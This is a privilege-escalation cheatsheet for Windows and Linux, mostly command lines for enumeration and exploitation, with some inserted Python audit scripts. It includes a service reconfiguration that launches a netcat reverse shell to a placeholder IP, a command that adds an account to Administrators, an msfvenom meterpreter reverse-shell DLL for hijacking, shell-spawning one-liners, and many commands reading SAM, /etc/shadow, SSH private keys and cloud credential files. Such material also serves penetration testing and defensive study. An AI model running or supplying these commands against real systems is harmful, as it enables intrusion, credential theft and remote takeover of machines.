Find an Exploit

Privilege Escalation Master

Here you will find a quick cheatsheet for Windows and Linux privilege escalation vulnerabilities. Under every type of vulnerability there is a link to a database of vulnerabilities, a tip, or a link to a tool to quickly guide you to the right exploit.

Windows

Kernel


OS name and version:
>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Check drivers:
>driverquery
Check Patches:
>wmic qfe get Caption,Description,HotFixID,InstalledOn
Tools for enumeration:
Sherlock
Watson
Windows Exploit Suggester
Got lucky?
Search Kernel Exploits Here

Services


Enumeration:
>sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\output.txt

Modify a service binary:
>sc config [Service_Name] binpath= "C:\nc.exe -nv X.X.X.X 8888 -e C:\WINDOWS\System32\cmd.exe"

>sc config [Service_Name] binpath= "net localgroup administrators username /add"
>sc config [Service_Name] binpath= "C:\Documents and Settings\%username%\reverseshell.exe"

Restart service:
>wmic service NAMEOFSERVICE call startservice
>net stop [service name] && net start [service name]

Unquoted Service Path


If the path to a service executable is not enclosed in quotes, Windows will try to execute it from each directory along the path in turn. For example, for the path C:\Program Files\Some Folder\Service.exe Windows will try to execute:
C:\reverseshell.exe
C:\Program Files\reverseshell.exe
C:\Program Files\Some Folder\reverseshell.exe

Enumeration command:
>wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
Check Permissions:

>icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
>icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
>icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
>icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
Need some help?
A list of applications that may have this issue: click here
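As an added example (not from the original cheatsheet), a Python audit that parses the wmic service output from the enumeration command above and, for each Auto-start service outside the Windows directory with an unquoted path containing spaces, lists the executables Windows would look for before the real one; those are the directories whose permissions the icacls commands above should be run against. The wmic output below is constructed sample data.

```python
import re

# Constructed sample of "wmic service get name,displayname,pathname,startmode" output
# (columns are separated by runs of two or more spaces, as wmic prints them).
SAMPLE_WMIC = r"""Name       DisplayName         PathName                                              StartMode
Spooler    Print Spooler       C:\Windows\System32\spoolsv.exe                       Auto
VulnSvc    Vulnerable Service  C:\Program Files\Some Folder\Service.exe -k netsvcs   Auto
SafeSvc    Safe Service        "C:\Program Files\Other Folder\Safe.exe" -run         Auto
ManualSvc  Manual Service      C:\Program Files\Manual App\manual.exe                Manual
"""


def parse_wmic_services(text):
    """Split the column-aligned wmic output into dicts; the header line is skipped."""
    rows = []
    for line in text.splitlines()[1:]:
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) < 4:
            continue
        rows.append({"name": cols[0], "display": cols[1],
                     "path": " ".join(cols[2:-1]), "mode": cols[-1]})
    return rows


def lookup_candidates(pathname):
    """Executables CreateProcess tries, in order, for an unquoted ImagePath that
    contains spaces: each space-delimited prefix with .exe appended, then the real one.
    Arguments after the .exe are ignored; a path without spaces yields only itself."""
    exe_match = re.match(r"(?i)^(.*?\.exe)", pathname.strip())
    exe = exe_match.group(1) if exe_match else pathname.strip().split(" ")[0]
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))] + [exe]


def find_unquoted_auto_services(text):
    """Same filter as the findstr chain above (Auto start, outside the Windows directory,
    no quotes), returning {service name: lookup_candidates} for paths containing a space."""
    findings = {}
    for svc in parse_wmic_services(text):
        path = svc["path"]
        if svc["mode"].lower() != "auto" or '"' in path or path.lower().startswith("c:\\windows\\"):
            continue
        candidates = lookup_candidates(path)
        if len(candidates) > 1:
            findings[svc["name"]] = candidates
    return findings
```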

DLL Hijacking


Windows has a search path for DLLs in its underlying architecture. If you can figure out what DLLs an executable requests without an absolute path (triggering this search process), you can then place your hostile DLL somewhere higher up the search path so it’ll be provided to the application before the real version.
Search order:
The directory from which the application loaded.
The system directory. (C:\Windows\System32)
The 16-bit System Directory. (C:\Windows\System)
The Windows directory. (C:\Windows)
The current directory.
The directories that are listed in the PATH environment variable.

Enumeration:
>wmic process > outfile
>tasklist /FO CSV > tasks.txt

Enumeration tools:

Robber
Enumeration Tool

Autoruns
Find startup programs and show the file path the program runs from.

Procmon
Apply a basic filter with the following properties:
Process Name is <[Value]>
Result is <[NAME NOT FOUND]>
Path ends with .dll*

Powersploit tool to enumerate and exploit:
Find-ProcessDLLHijack
Find-PathDLLHijack
Write-HijackDll

Now use the search order to check where the original DLL is loaded from. If it is loaded from the Windows directory, you can use the first three locations to inject your DLL.

Check Permissions:
>icacls .

Generate the DLL file:
>msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=8888 -f dll > output.dll
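An added example, not from the original page: given a Procmon CSV export filtered as described above (constructed sample; the column names are assumed to match Procmon's export layout), report for each DLL which directories were probed with NAME NOT FOUND before it was found, and map each one to its position in the search order listed above, so the permissions on exactly those directories can be checked. The C:\Windows location of the Windows directory is an assumption passed as a parameter.

```python
import csv
import io
import ntpath

# Constructed sample in the layout of a Procmon CSV export, after the filter described
# above (Process Name, Result is NAME NOT FOUND, Path ends with .dll) plus the final
# SUCCESS line that shows where the real DLL was eventually found.
SAMPLE_PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:00:01.0001","app.exe","1234","CreateFile","C:\Program Files\App\helper.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:00:01.0002","app.exe","1234","CreateFile","C:\Windows\System32\helper.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:00:01.0003","app.exe","1234","CreateFile","C:\Windows\System\helper.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:00:01.0004","app.exe","1234","CreateFile","C:\Windows\helper.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:00:01.0005","app.exe","1234","CreateFile","C:\Users\alice\Desktop\helper.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:00:01.0006","app.exe","1234","CreateFile","C:\Tools\helper.dll","SUCCESS","Desired Access: Read Attributes"
"10:00:01.0007","app.exe","1234","CreateFile","C:\Program Files\App\config.ini","NAME NOT FOUND","Desired Access: Read Attributes"
'''

# The search order exactly as listed above; index + 1 is the slot number reported below.
SEARCH_ORDER = ["application directory", "system directory", "16-bit system directory",
                "windows directory", "current directory", "PATH directory"]


def search_order_slot(directory, app_dir, cwd, path_dirs, windir=r"C:\Windows"):
    """Map a probed directory to its 1-based position in SEARCH_ORDER, or None if it is none of them."""
    norm = lambda p: ntpath.normcase(p.rstrip("\\"))
    fixed = [app_dir, ntpath.join(windir, "System32"), ntpath.join(windir, "System"), windir, cwd]
    for slot, candidate in enumerate(fixed, start=1):
        if norm(directory) == norm(candidate):
            return slot
    return 6 if any(norm(directory) == norm(p) for p in path_dirs) else None


def dll_probe_report(csv_text, process_name, app_dir, cwd, path_dirs):
    """For each DLL the process looked up, list the directories probed (with their search-order
    slot) before the DLL was found, plus where it was finally found. Every probed directory
    that sits earlier in the search order than found_in needs its permissions checked (icacls)."""
    report = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process_name.lower() or not row["Path"].lower().endswith(".dll"):
            continue
        directory, dll = ntpath.split(row["Path"])
        entry = report.setdefault(dll.lower(), {"probed": [], "found_in": None})
        if entry["found_in"] is not None:
            continue  # already resolved; later probes belong to a different load
        if row["Result"] == "NAME NOT FOUND":
            entry["probed"].append((directory, search_order_slot(directory, app_dir, cwd, path_dirs)))
        elif row["Result"] == "SUCCESS":
            entry["found_in"] = directory
    return report
```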

Disclosed Credentials


Search for files containing passwords:
>findstr /si password *.xml *.ini *.txt *.config 2>nul
>findstr /si pass *.txt *.xml *.ini

Check unattended files:
C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf

Check SAM and SYSTEM files:

%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Cloud Credentials


Check the user home directory for the following files:
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json

Other enumeration commands:


Info about current user:
>whoami
>echo %USERNAME%
>whoami /priv
Other users:
>net users
>dir /b /ad "C:\Users\"
Groups:
>net localgroup
>net localgroup Administrators
>whoami /all

Network connections and the firewall rules:
>netstat -ano
>netsh firewall show state
>netsh firewall show config

Checking AV:
>WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more
Check clipboard content:
>powershell -command "Get-Clipboard"
Processes and services:
>tasklist /SVC
>tasklist /v
>net start
>sc query
Installed Programs:
>dir /a "C:\Program Files"
>dir /a "C:\Program Files (x86)"
>reg query HKEY_LOCAL_MACHINE\SOFTWARE

Run at Startup:
>wmic startup get caption,command
>reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
>reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
>reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
>reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
>dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
>dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

Scheduled tasks:
>schtasks /query /fo LIST 2>nul | findstr TaskName
>dir C:\windows\tasks

Linux

Kernel


Check the OS / Architecture / Kernel version:
$uname -a
$uname -mrs
$cat /proc/version
$cat /etc/issue
$cat /etc/*-release
$cat /etc/lsb-release # Debian based
$cat /etc/redhat-release # Redhat based
$rpm -q kernel
$dmesg | grep Linux
$ls /boot | grep vmlinuz-

Check Development Environment on Target Hosts:
$find / -name perl*
$find / -name python*
$find / -name gcc*
$find / -name cc

Use searchsploit to find an exploit,

or search through hacking-resources here.

Services


Check running services:
$ps aux
$ps -ef
$top
$cat /etc/services
$netstat -antup
Check which services are running as root:
$ps aux | grep root
$ps -ef | grep root

Check installed applications and whether they are running:
$ls -alh /usr/bin/
$ls -alh /sbin/
$dpkg -l
$rpm -qa
$ls -alh /var/cache/apt/archives
$ls -alh /var/cache/yum/

Check services configuration:
$cat /etc/syslog.conf
$cat /etc/chttp.conf
$cat /etc/lighttpd.conf
$cat /etc/cups/cupsd.conf
$cat /etc/inetd.conf
$cat /etc/apache2/apache2.conf
$cat /etc/my.conf
$cat /etc/httpd/conf/httpd.conf
$cat /opt/lampp/etc/httpd.conf
$ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'

Then check whether the running services have public exploits, using searchsploit or Google.
If a service is running as root, check what you can execute through it.

SUID and SGID Misconfiguration


When a binary with the SUID bit set is run, it runs as the file's owner rather than as the invoking user, and therefore with that user's privileges. So we can try exploiting that behaviour.

Enumeration:
#Find SUID
$find / -perm -u=s -type f 2>/dev/null
#Find SGID
$find / -perm -g=s -type f 2>/dev/null
#Find both
$find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null
$find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null

A good place to look for this type of exploit is
GTFOBins

Disclosed Credentials


Enumeration:
#Search history files
$cat ~/.bash_history
$cat ~/.nano_history
$cat ~/.atftp_history
$cat ~/.mysql_history
$cat ~/.php_history
#Other files that may contain passwords
$cat /var/apache2/config.inc
$cat /var/lib/mysql/mysql/user.MYD
$cat /root/anaconda-ks.cfg
$cat /etc/syslog.conf
$cat /etc/chttp.conf
$cat /etc/lighttpd.conf
$cat /etc/cups/cupsd.conf
$cat /etc/inetd.conf
$cat /etc/apache2/apache2.conf
$cat /etc/my.conf
$cat /etc/httpd/conf/httpd.conf
$cat /opt/lampp/etc/httpd.conf
$ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'

#Finding SSH private keys
$cat ~/.ssh/authorized_keys
$cat ~/.ssh/identity.pub
$cat ~/.ssh/identity
$cat ~/.ssh/id_rsa.pub
$cat ~/.ssh/id_rsa
$cat ~/.ssh/id_dsa.pub
$cat ~/.ssh/id_dsa
$cat /etc/ssh/ssh_config
$cat /etc/ssh/sshd_config
$cat /etc/ssh/ssh_host_dsa_key.pub
$cat /etc/ssh/ssh_host_dsa_key
$cat /etc/ssh/ssh_host_rsa_key.pub
$cat /etc/ssh/ssh_host_rsa_key
$cat /etc/ssh/ssh_host_key.pub
$cat /etc/ssh/ssh_host_key
#Locate files with user or pass
$grep -i user [filename]
$grep -i pass [filename]

Cron Jobs


Enumeration:
$crontab -l
$ls -alh /var/spool/cron
$ls -al /etc/ | grep cron
$ls -al /etc/cron*
$cat /etc/cron*
$cat /etc/at.allow
$cat /etc/at.deny
$cat /etc/cron.allow
$cat /etc/cron.deny
$cat /etc/crontab
$cat /etc/anacrontab
$cat /var/spool/cron/crontabs/root
To exploit this, overwrite a cron script that has misconfigured permissions, or inject code into it.
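An added example, not from the original cheatsheet: a Python audit of /etc/crontab-style entries (constructed sample) that checks whether the scripts a job runs, or the directories holding them, are writable by group or others, which is the misconfiguration the cron section is about. The mode_of parameter is an assumption of this example so the check can run against constructed data; by default it stats the real filesystem.

```python
import os
import shlex
import stat

# Constructed sample in /etc/crontab format: minute hour dom month dow user command.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    /usr/local/bin/backup.sh
0 3     * * *   root    /bin/bash /opt/scripts/cleanup.sh --quiet
30 2    * * *   alice   /home/alice/sync.sh
"""


def cron_jobs(text):
    """Yield (user, command) from system-crontab lines, skipping blanks, comments and VAR=value lines."""
    for line in text.splitlines():
        fields = line.split(None, 6)
        if len(fields) < 7 or fields[0].startswith("#") or "=" in fields[0]:
            continue
        yield fields[5], fields[6]


def absolute_paths(command):
    """Absolute paths used in the command: interpreter, script, and anything after && or ;."""
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        tokens = command.split()
    return [tok for tok in tokens if tok.startswith("/")]


def writable_by_others(mode):
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron(text, mode_of=lambda path: os.stat(path).st_mode):
    """Return [(user, path, reason)] for jobs whose target file, or the directory holding it,
    is writable by group or others. mode_of is injectable (an assumption of this example)."""
    findings = []
    for user, command in cron_jobs(text):
        for path in absolute_paths(command):
            for target, kind in ((path, "file"), (os.path.dirname(path), "directory")):
                try:
                    mode = mode_of(target)
                except (OSError, KeyError):  # path missing (or absent from an injected table)
                    continue
                if writable_by_others(mode):
                    findings.append((user, path, f"{kind} {target} writable by group/others"))
    return findings
```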

$sudo


Enumeration:
#List sudoers
$cat /etc/sudoers
#Show which commands sudo allows you to run
$sudo -l
You can use GTFOBins here too.

Spawning a TTY Shell


$python -c 'import pty; pty.spawn("/bin/sh")'
From within python:
import os; os.system('/bin/bash')
$/bin/sh -i

$perl -e 'exec "/bin/sh";'
From within perl:
exec "/bin/sh";

From within ruby:
exec "/bin/sh"

From within lua:
os.execute('/bin/sh')

From within IRB:
exec "/bin/sh"
From within vi (either of):
:!bash
:set shell=/bin/bash:shell
From within nmap:
!sh

Other Commands


#Check sensitive files
$cat /etc/passwd
$cat /etc/group
$cat /etc/shadow
$ls -alh /var/mail/

#Check user history
$cat ~/.bash_history
$cat ~/.nano_history
$cat ~/.atftp_history
$cat ~/.mysql_history
$cat ~/.php_history

#World writable files:

$find / -writable -type d 2>/dev/null # folders writable by the current user
$find / -perm -222 -type d 2>/dev/null # world-writable folders
$find / -perm -o=w -type d 2>/dev/null # world-writable folders
$find / -perm -o=x -type d 2>/dev/null # world-executable folders
$find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null # world-writable & executable folders

#Find a way to upload files:
$find / -name wget
$find / -name nc*
$find / -name netcat*
$find / -name tftp*
$find / -name ftp

#List environment variables
$cat /etc/profile
$cat /etc/bashrc
$cat ~/.bash_profile
$cat ~/.bashrc
$cat ~/.bash_logout
$env

#Check log files:

$cat /etc/httpd/logs/access_log
$cat /etc/httpd/logs/access.log
$cat /etc/httpd/logs/error_log
$cat /etc/httpd/logs/error.log
$cat /var/log/apache2/access_log
$cat /var/log/apache2/access.log
$cat /var/log/apache2/error_log
$cat /var/log/apache2/error.log
$cat /var/log/apache/access_log
$cat /var/log/apache/access.log
$cat /var/log/auth.log
$cat /var/log/chttp.log
$cat /var/log/cups/error_log
$cat /var/log/dpkg.log
$cat /var/log/faillog
$cat /var/log/httpd/access_log
$cat /var/log/httpd/access.log
$cat /var/log/httpd/error_log
$cat /var/log/httpd/error.log
$cat /var/log/lastlog
$cat /var/log/lighttpd/access.log
$cat /var/log/lighttpd/error.log
$cat /var/log/lighttpd/lighttpd.access.log
$cat /var/log/lighttpd/lighttpd.error.log
$cat /var/log/messages
$cat /var/log/secure
$cat /var/log/syslog
$cat /var/log/wtmp
$cat /var/log/xferlog
$cat /var/log/yum.log
$cat /var/run/utmp
$cat /var/webmin/miniserv.log
$cat /var/www/logs/access_log
$cat /var/www/logs/access.log
$ls -alh /var/lib/dhcp3/
$ls -alh /var/log/postgresql/
$ls -alh /var/log/proftpd/
$ls -alh /var/log/samba/